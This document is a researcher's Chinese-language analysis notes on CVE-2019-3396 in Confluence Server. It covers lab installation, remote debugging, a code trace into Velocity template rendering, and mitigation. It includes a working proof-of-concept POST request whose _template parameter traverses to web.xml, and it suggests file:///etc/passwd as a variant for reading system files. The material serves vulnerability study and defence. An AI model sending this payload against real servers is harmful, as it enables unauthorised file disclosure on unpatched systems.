Confluence CVE-2019-3396
https://jira.atlassian.com/browse/CONFSERVER-57974
https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py
https://chybeta.github.io/2019/04/06/Analysis-for-【CVE-2019-3396】-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/
Poc
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: cqq.com:443
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3670.0 Safari/537.36
Referer: https://cqq.com/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 168
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
或者改成file:///etc/passwd读取passwd文件。网上有可以读passwd文件的,但是在本地搭建环境没有成功读到/etc/passwd。
Conluence安装
$ wget https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.13.0.tar.gz
$ tar zxf atlassian-confluence-6.13.0.tar.gz
$ cd atlassian-confluence-6.13.0
$ vi ./confluence/WEB-INF/classes/confluence-init.properties #设置confluence的home目录,这里我设置为
#confluence.home=/home/cqq/confluence
$ vi ./conf/server.xml
将这段外的注释去掉,
<Connector port="8090" connectionTimeout="20000" redirectPort="8443"
maxThreads="48" minSpareThreads="10"
enableLookups="false" acceptCount="10" debug="0" URIEncoding="UTF-8"
protocol="org.apache.coyote.http11.Http11NioProtocol"/>
然后就可以启动
$ bin/start-confluence.sh
启动之后访问8090端口,一步步完成安装。
安装过程之一如下:
postgresql数据库/用户配置
之前都是安装mysql比较多,这次换用postgresql。具体命令可参考:https://blog.****.net/zhangzeyuaaa/article/details/77941039
$ su - postgres
[email protected]:~$ psql -U postgres
[email protected]:~$ psql -U postgres
psql (10.6 (Ubuntu 10.6-0ubuntu0.18.04.1))
Type "help" for help.
postgres=# CREATE USER wiki WITH PASSWORD 'wiki';
CREATE ROLE
postgres=# CREATE DATABASE wiki OWNER wiki;
CREATE DATABASE
postgres=# GRANT ALL PRIVILEGES ON DATABASE jira TO wiki;
GRANT
配置远程调试
编辑bin/setenv.sh。
添加:
CATALINA_OPTS="-Xrunjdwp:transport=dt_socket,suspend=n,server=y,address=12346 ${CATALINA_OPTS}" # for debug
然后再启动confluence:
bin/start-confluence.sh
触发位置
参考:https://confluence.atlassian.com/doc/widget-connector-macro-171180449.html
插入(+)=> 其他宏 => 小工具连接器
点击预览功能时发的包里并没有_template参数:
分析
定位一下,应该是这个jar包:
confluence/WEB-INF/atlassian-bundled-plugins/widgetconnector-3.1.2.jar
通过jd-gui导出为java。
vi confluence/WEB-INF/web.xml
发现对应的filter是这个:
com.atlassian.confluence.web.filter.DropIfNotSetupFilter
对应的jar包是这个:
confluence/WEB-INF/lib/confluence-6.13.0.jar
调试
用常规的IDEA远程调试这个jar包不知道怎么调试,搜了一下,发现atlassian有自己的调试方式:
https://developer.atlassian.com/server/framework/atlassian-sdk/creating-a-remote-debug-target/
需要下载atlassian-sdk:
https://developer.atlassian.com/server/framework/atlassian-sdk/downloads/
安装参考:
https://developer.atlassian.com/display/DOCS/Install+the+Atlassian+SDK+on+a+Linux+or+Mac+system
使用apt install方式和下载deb包的方式失败了,
试试直接下载tar.gz包:
wget https://marketplace.atlassian.com/download/plugins/atlassian-plugin-sdk-tgz?_ga=2.59234733.1012239446.1554698071-91862862.1554345070
sudo tar -xvzf atlassian-plugin-sdk-4.0.tar.gz -C /opt
代码追踪
WidgetMacro.java
DefaultRendererManager.java
- widgetRenderer.getEmbeddedHtml(url, params);
YoutubeRenderer.java
DefaultVelocityRenderService.java
最终会调用
getVelocityEngine().evaluate(velocityContext, writer, "getRenderedContent", templateContent.toString());
即org.apache.velocity.app.VelocityEngine的
evaluate(Context context, Writer out, String logTag, String instring)
方法:
https://velocity.apache.org/engine/devel/apidocs/org/apache/velocity/app/VelocityEngine.html#evaluate-org.apache.velocity.context.Context-java.io.Writer-java.lang.String-java.lang.String-
3. return getRenderedTemplate((Map)contextMap);
缓解措施
禁用几个插件,升级,然后重新开启。如果不能升级的话,就只能防火墙拦截了。